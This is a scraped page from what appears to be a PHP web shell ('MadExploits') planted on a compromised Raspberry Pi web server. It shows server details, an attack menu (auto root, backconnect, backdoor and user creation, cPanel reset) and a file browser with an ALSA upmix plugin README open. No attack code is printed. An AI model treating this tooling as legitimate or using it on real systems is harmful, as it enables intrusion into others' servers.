Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libasound2-plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
README-arcam-av
1012
B
-rw-r--r--
README-jack
1.3
KB
-rw-r--r--
README-maemo.gz
2.63
KB
-rw-r--r--
README-pcm-oss
1.02
KB
-rw-r--r--
README-pulse
1.9
KB
-rw-r--r--
a52.txt
1.73
KB
-rw-r--r--
changelog.Debian.gz
5.83
KB
-rw-r--r--
copyright
1.49
KB
-rw-r--r--
lavrate.txt
1.01
KB
-rw-r--r--
samplerate.txt
933
B
-rw-r--r--
speexdsp.txt
1.27
KB
-rw-r--r--
speexrate.txt
958
B
-rw-r--r--
upmix.txt
1.21
KB
-rw-r--r--
vdownmix.txt
560
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upmix.txt
UPMIX PLUGIN ============ The upmix plugin is an easy-to-use plugin for upmixing to 4 or 6-channel stream. The number of channels to be expanded is determined by the slave PCM or explicitly via channel option. For example, the following PCM defines upmixing to 5.1 from 1-6 channels input: pcm.upmix51 { type upmix slave.pcm "surround51" } You can use this PCM as a default one by defining below: pcm.!default "plug:upmix51" The upmix plugin copies left and right channels to rear left and right with a certain delay. The delay size can be specified by "delay" PCM option in msec. For example, to set 10ms delay in the above case: pcm.upmix51 { type upmix slave.pcm "surround51" delay 10 } As default, 15ms delay is used. The channel option specifies the number of channels of output. Either 4 or 6 channels are supported. When 0 is passed, the plugin tries 4 or 6 channels appropriately suitable for the slave pcm. The channel option is useful if the slave PCM has no strict input condition (like plug or route plugin). pcm.myupmix { type upmix slave.pcm "something" channels 6 } The center and LFE channels are the average of sum of left and right signals. The accepted format is currently only S16.
Close